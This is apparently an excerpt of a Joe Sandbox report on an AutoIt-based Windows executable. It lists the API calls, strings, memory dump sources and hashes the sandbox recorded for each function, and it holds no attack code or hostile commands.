                                                                                                                                  • Instruction ID: ae5ad86c9e5086de44df58fc6d38cac1ebaeb7d27b4839a02853452ce526b4ce
                                                                                                                                  • Opcode Fuzzy Hash: 6dc0678182293c917604c244841ccea436432112cf667a5ca777d98a69f06806
                                                                                                                                  • Instruction Fuzzy Hash: 4BC14671608349AFC704DF64C88496BB7E9FF88348F14591DF68AAB251DB70ED05CB52

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00EA2F8B
                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00EA2FB5
                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00EA2FC6
                                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00EA3009
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                                  • Opcode ID: a6ba5c6b3a1e752fbdcc924a1d464f8a84f558587193f2f72c15945440faa551
                                                                                                                                  • Instruction ID: 96706eddca39c43136ba2dddc588faab717c4a42f5c1be7c89cb7a00c2dd88a3
                                                                                                                                  • Opcode Fuzzy Hash: a6ba5c6b3a1e752fbdcc924a1d464f8a84f558587193f2f72c15945440faa551
                                                                                                                                  • Instruction Fuzzy Hash: B421BFB590031CAFDB10DFA4E889BCEBBF4FB09701F14411AF625A62A0D7B54545EF91

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F023E6
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F02579
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F0259D
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F025DD
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F025FF
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F02760
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F02792
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00F027C1
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00F02838
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4090791747-0
                                                                                                                                  • Opcode ID: cfc8844cb0cd3ec1ea9a343f288f3b7905beb2b470dbfa382ee48da5ed44e7a0
                                                                                                                                  • Instruction ID: f55a65c681ff77ced24a81a8ac63d23ecec0727c62b26896139d7ad5ff921979
                                                                                                                                  • Opcode Fuzzy Hash: cfc8844cb0cd3ec1ea9a343f288f3b7905beb2b470dbfa382ee48da5ed44e7a0
                                                                                                                                  • Instruction Fuzzy Hash: 3FD1C435504301DFC715EF24C895B6ABBE1AF89324F18845DF895AB2E2DB31EC41EB62

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                  • API String ID: 0-572801152
                                                                                                                                  • Opcode ID: 3459f00350184f428910db53040e549e34a07c9ad3ec9ec90f6c513f84bab7d6
                                                                                                                                  • Instruction ID: bb4a0654f55b0773b5b3f7852ca6ef71dcb16bf07341645a81bd6d00aaf26101
                                                                                                                                  • Opcode Fuzzy Hash: 3459f00350184f428910db53040e549e34a07c9ad3ec9ec90f6c513f84bab7d6
                                                                                                                                  • Instruction Fuzzy Hash: E3E1A171A0021DABDF14DF64CA81AFEB7B5EF48314F349469EA45BB281D770AD41CB50

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                                  • Opcode ID: 6cdd67b68d6cadd53c191b80d57d65140622f46d719b007dd00883a1f57e8853
                                                                                                                                  • Instruction ID: f6aa91025bb86e9df3af18a54a8924d2fc7ab9cf77b08445175b0ff4f9f88136
                                                                                                                                  • Opcode Fuzzy Hash: 6cdd67b68d6cadd53c191b80d57d65140622f46d719b007dd00883a1f57e8853
                                                                                                                                  • Instruction Fuzzy Hash: 0D91BD71A0020DABDB24CFA4C944FAEBBB8EF45714F309159FA15BB291D7709946CBA0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EA34E2,?,00000001), ref: 00EA3FCD
                                                                                                                                  • _free.LIBCMT ref: 00F13C27
                                                                                                                                  • _free.LIBCMT ref: 00F13C6E
                                                                                                                                    • Part of subcall function 00EABDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00F622E8,?,00000000,?,00EA3E2E,?,00000000,?,00F3DBF0,00000000,?), ref: 00EABE8B
                                                                                                                                    • Part of subcall function 00EABDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00EA3E2E,?,00000000,?,00F3DBF0,00000000,?,00000002), ref: 00EABEA7
                                                                                                                                    • Part of subcall function 00EABDF0: __wsplitpath.LIBCMT ref: 00EABF19
                                                                                                                                    • Part of subcall function 00EABDF0: _wcscpy.LIBCMT ref: 00EABF31
                                                                                                                                    • Part of subcall function 00EABDF0: _wcscat.LIBCMT ref: 00EABF46
                                                                                                                                    • Part of subcall function 00EABDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00EABF56
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<$G-
                                                                                                                                  • API String ID: 1510338132-2169190053
                                                                                                                                  • Opcode ID: 4d01f0c9b5b5f5fdc86915ceff37baf8fbec35a38e7eeb013b5f052fcfe4f4fd
                                                                                                                                  • Instruction ID: 999ae6b22154a1ee921038cddf667e144cea15b1fc536e8ea96ed4bd441a6410
                                                                                                                                  • Opcode Fuzzy Hash: 4d01f0c9b5b5f5fdc86915ceff37baf8fbec35a38e7eeb013b5f052fcfe4f4fd
                                                                                                                                  • Instruction Fuzzy Hash: A9915D72910259AFCF04EFA4CC919EEB7B4BF09310F145429F416BB291EB34AE45DB50
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00EBEADA,?,?), ref: 00EBEB27
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00EBEADA,?,?), ref: 00F14B26
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00EBEADA,?,?), ref: 00F14B65
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00EBEADA,?,?), ref: 00F14B94
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                                  • Opcode ID: 1a540a12138a12d29a67b70534265650daaea1c74767f4aaeb1d96d2e971d768
                                                                                                                                  • Instruction ID: 4d7561fd80001690f646c33b52d1281b159d2f943c034d46b7b354ad30b9c61a
                                                                                                                                  • Opcode Fuzzy Hash: 1a540a12138a12d29a67b70534265650daaea1c74767f4aaeb1d96d2e971d768
                                                                                                                                  • Instruction Fuzzy Hash: B3114271A0510CBEEB14DBA4DD86EFE7BBCEF44354F101059F506E61A0DA70AE41E750
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EA2ECB
                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EA2EEC
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00EA2F00
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00EA2F09
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                  • Opcode ID: 218fea915081f4e3151318995c1e4d2829ab63b8c41b9a41aa366bfa8be49798
                                                                                                                                  • Instruction ID: b2b68fdff1d8431b73f5e46d38a3ff6652b9be11c8874a22de3b473fd1dc4755
                                                                                                                                  • Opcode Fuzzy Hash: 218fea915081f4e3151318995c1e4d2829ab63b8c41b9a41aa366bfa8be49798
                                                                                                                                  • Instruction Fuzzy Hash: 9BF03A70A402D87AEB305763AC08E673E7EE7C7F20F05401EFA19A21A0C1A50881FAB0
                                                                                                                                  APIs
                                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00EF9409
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF9416
                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00EF943A
                                                                                                                                  • _strlen.LIBCMT ref: 00EF9484
                                                                                                                                  • _memmove.LIBCMT ref: 00EF94CA
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF94F7
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2795762555-0
                                                                                                                                  • Opcode ID: ef3855f0f74274d859e5d322168a174244553551c5a16a0e5cfd61997702eacc
                                                                                                                                  • Instruction ID: e558c0736a714af00b60efd715b15fc3ede9affdbfbe8209b3404de9b650ec3a
                                                                                                                                  • Opcode Fuzzy Hash: ef3855f0f74274d859e5d322168a174244553551c5a16a0e5cfd61997702eacc
                                                                                                                                  • Instruction Fuzzy Hash: 6F416F75500108AFCB14EB64CD85BAEB7B9EF58314F205169F616AB292DB34AE41CB60
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA3B1E: _wcsncpy.LIBCMT ref: 00EA3B32
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00EE6DBA
                                                                                                                                  • GetLastError.KERNEL32 ref: 00EE6DC5
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EE6DD9
                                                                                                                                  • _wcsrchr.LIBCMT ref: 00EE6DFB
                                                                                                                                    • Part of subcall function 00EE6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00EE6E31
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3633006590-0
                                                                                                                                  • Opcode ID: 1f583b584ae24fd080dcc8d0c40386f9144c53b4ef1c005ad9b4c015df25200e
                                                                                                                                  • Instruction ID: c3c47ebb144290c8e64ecfc7209620d17561405948d3520ae0ec2b1df7229fad
                                                                                                                                  • Opcode Fuzzy Hash: 1f583b584ae24fd080dcc8d0c40386f9144c53b4ef1c005ad9b4c015df25200e
                                                                                                                                  • Instruction Fuzzy Hash: 2D212735A0131C9ADF2077B5EC4ABEA33ACCF21394F602155E020F30E2EB20CE859650
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EFACD3: inet_addr.WS2_32(00000000), ref: 00EFACF5
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00EF9160
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF916F
                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00EF918B
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3701255441-0
                                                                                                                                  • Opcode ID: 6fc07e46b1fa215def14cdaa413e39e9d256374041fde9e59a1f3ff39b1c016d
                                                                                                                                  • Instruction ID: 478527f501f7e2fd10761f1a7e6adb9e0e2ec3e870d706962e94df8e77cc8f69
                                                                                                                                  • Opcode Fuzzy Hash: 6fc07e46b1fa215def14cdaa413e39e9d256374041fde9e59a1f3ff39b1c016d
                                                                                                                                  • Instruction Fuzzy Hash: 9721C0312002189FDB10AF68CC89B7EB7E9EF48724F059019FA56BB392CB74EC018B51
                                                                                                                                  APIs
                                                                                                                                  • SHGetMalloc.SHELL32(1<), ref: 00EA3A7D
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00EA3AD2
                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00EA3A8F
                                                                                                                                    • Part of subcall function 00EA3B1E: _wcsncpy.LIBCMT ref: 00EA3B32
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                  • String ID: 1<
                                                                                                                                  • API String ID: 3981382179-2494417897
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EBC948,SwapMouseButtons,00000004,?), ref: 00EBC979
                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00EBC948,SwapMouseButtons,00000004,?,?,?,?,00EBBF22), ref: 00EBC99A
                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,00EBC948,SwapMouseButtons,00000004,?,?,?,?,00EBBF22), ref: 00EBC9BC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA16F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00EA1751
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EA159B
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EA1612
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F158F7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                  • String ID: '/
                                                                                                                                  • API String ID: 458326420-966873530
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA41A7: _fseek.LIBCMT ref: 00EA41BF
                                                                                                                                    • Part of subcall function 00EECE59: _wcscmp.LIBCMT ref: 00EECF49
                                                                                                                                    • Part of subcall function 00EECE59: _wcscmp.LIBCMT ref: 00EECF5C
                                                                                                                                  • _free.LIBCMT ref: 00EECDC9
                                                                                                                                  • _free.LIBCMT ref: 00EECDD0
                                                                                                                                  • _free.LIBCMT ref: 00EECE3B
                                                                                                                                    • Part of subcall function 00EC28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00EC8715,00000000,00EC88A3,00EC4673,?), ref: 00EC28DE
                                                                                                                                    • Part of subcall function 00EC28CA: GetLastError.KERNEL32(00000000,?,00EC8715,00000000,00EC88A3,00EC4673,?), ref: 00EC28F0
                                                                                                                                  • _free.LIBCMT ref: 00EECE43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1552873950-0
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EA1E87
                                                                                                                                    • Part of subcall function 00EA38E4: _memset.LIBCMT ref: 00EA3965
                                                                                                                                    • Part of subcall function 00EA38E4: _wcscpy.LIBCMT ref: 00EA39B5
                                                                                                                                    • Part of subcall function 00EA38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EA39C6
                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00EA1EDC
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EA1EEB
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F14526
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF282
                                                                                                                                    • Part of subcall function 00EBF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF2A6
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00EF92F0
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF92FB
                                                                                                                                  • _memmove.LIBCMT ref: 00EF9328
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 00EF9333
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1504782959-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC45EC: __FF_MSGBANNER.LIBCMT ref: 00EC4603
                                                                                                                                    • Part of subcall function 00EC45EC: __NMSG_WRITE.LIBCMT ref: 00EC460A
                                                                                                                                    • Part of subcall function 00EC45EC: RtlAllocateHeap.NTDLL(01100000,00000000,00000001), ref: 00EC462F
                                                                                                                                  • std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                    • Part of subcall function 00EC7495: RaiseException.KERNEL32(?,?,00EA125D,00F56598,?,?,?,00EC0158,00EA125D,00F56598,?,00000001), ref: 00EC74E6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                  • String ID: bad allocation
                                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 19560607-0
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00EAC00E,?,?,?,?,00000010), ref: 00EAC627
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00EAC65F
                                                                                                                                  • _memmove.LIBCMT ref: 00EAC697
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033907384-0
                                                                                                                                  APIs
                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00EC4603
                                                                                                                                    • Part of subcall function 00EC8E52: __NMSG_WRITE.LIBCMT ref: 00EC8E79
                                                                                                                                    • Part of subcall function 00EC8E52: __NMSG_WRITE.LIBCMT ref: 00EC8E83
                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 00EC460A
                                                                                                                                    • Part of subcall function 00EC8EB2: GetModuleFileNameW.KERNEL32(00000000,00F60312,00000104,?,00000001,00EC0127), ref: 00EC8F44
                                                                                                                                    • Part of subcall function 00EC8EB2: ___crtMessageBoxW.LIBCMT ref: 00EC8FF2
                                                                                                                                    • Part of subcall function 00EC1D65: ___crtCorExitProcess.LIBCMT ref: 00EC1D6B
                                                                                                                                    • Part of subcall function 00EC1D65: ExitProcess.KERNEL32 ref: 00EC1D74
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  • RtlAllocateHeap.NTDLL(01100000,00000000,00000001), ref: 00EC462F
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1372826849-0
                                                                                                                                  APIs
                                                                                                                                  • TranslateMessage.USER32(?), ref: 00EAE646
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00EAE651
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EAE664
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                  APIs
